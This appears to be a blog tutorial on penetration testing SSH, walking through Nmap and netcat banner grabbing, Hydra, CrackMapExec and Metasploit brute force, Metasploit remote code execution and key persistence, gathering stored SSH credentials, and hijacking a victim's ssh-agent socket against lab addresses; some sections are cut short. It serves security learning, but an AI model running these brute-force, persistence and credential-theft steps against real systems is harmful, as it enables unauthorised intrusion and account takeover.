Welcome, today I am writing about SSH Penetration Testing fundamentals describing port 22 vulnerabilities. SSH security is one of the topics we all need to understand, remote access services can be an entry point for malicious actors when configured improperly.
Understand SSH Protocol
Understanding how SSH works are out of scope, here I assume you already are familiar with the service and how can be configured on a Linux host.
Some things to remember, SSH works on port 22 by default and uses a client-server architecture, which is used to access remote hosts securely.
SSH can implement different types of authentication each one of them has its security vulnerabilities, keep that in mind! One of the most used methods to authenticate is the use of RSA Keys using the PKI infrastructure. Another great feature is the possibility to create encrypted tunnels between machines or implement port forwarding on local or remote services, or Us as pentesters we can use it to pivot inside the network under the radar since SSH is a well-known tool by sysadmins.
Read more about Pivoting using SSH
SSH Penetration Testing
Ok let’s talk about how to pentest SSH, as you know its all start with enumeration we can use some tools to do all the work for us or we can do it manually.
Some questions to ask before starting enumerating
- Is there any SSH server running?
- On what Port?
- What version is running?
- Any Exploit to that version?
- What authentication type is used? Passwords / RSA Keys
- It is blocking brute force?
After we have all the answers we can start thinking about what to do, if don’t have any information about users or passwords/kays yet is better to search for an exploit unfortunately SSH exploits are rare, search my website if there are any exploits.
Damn it, we are stuck :/
It’s time to go enumerate other services and try to find something that can be used like usernames or RSA Keys, remember keys usually have the username at the bottom.
Assuming we found one or more usernames we can try to brute force the service using a good wordlist or if we were lucky and have found an RSA Key with a username, We Are In!
Haha is not so easy, but OK, we are learning…
SSH Client Interesting Files
SSH client configuration file, this file can be used
Default folder containing RSA Keys
cd ~/.ssh cd /home/rfs/.ssh
After we scan a network and identify port 22 open on a remote host we need to identify what SSH service is running and what version and for that, we can use Nmap.
nmap -sV -p22 192.168.1.96
SSH Banner Grabber
Banner grabbing is and eay technique to do but can help us a lot, we can verify what service version is runnig on the remote server and try to find a CVE related to it.
nc 192.168.1.96 22
ssh -v 192.168.1.96
|SSH Servers List||Website|
|Cisco SSH Server|
Attack SSH port 22
At this point, we only know what service running on port 22 and what version it has (OpenSSH_4.7p1 Debian-8ubuntu1), assuming we have found the username msfadmin we will try to brute-force his password using hydra.
Bruteforce SSH Service
hydra -l msfadmin -P rockyou.txt ssh://192.168.1.96
crackmapexec ssh -U user -P passwd.lst 192.168.1.96
use auxiliary/scanner/ssh/ssh_login set rhosts 192.168.1.96 set user_file user.txt set pass_file password.txt run
Crack SSH Private Keys
use post/linux/manage/sshkey_persistence msf post(sshkey_persistence) > set session 1 msf post(sshkey_persistence) >exploit
SSH User Code Execution
msf > use exploit/multi/ssh/sshexec msf exploit(sshexec) >set rhosts 192.168.1.103 msf exploit(sshexec) >set username ignite msf exploit(sshexec) >set password 123 msf exploit(sshexec) >set srvhost 192.168.1.107 msf exploit(sshexec) >exploit
Steal SSH credentials
If we have a meterpreter shell we can use the post exploitation module post/multi/gather/ssh_creds and try to collect all SSH credentials on the machine.
use post/multi/gather/ssh_creds msf post(ssh_creds) >set session 1 msf post(ssh_creds) >exploit
# Attacker finds the SSHd process of the victim ps uax|grep sshd # Attacker looks for the SSH_AUTH_SOCK on victim's environment variables grep SSH_AUTH_SOCK /proc/<pid>/environ
# Attacker hijack's victim's ssh-agent socket SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l # Attacker can login to remote systems as the victim ssh remote_system -l vicitm
Working with RSA Keys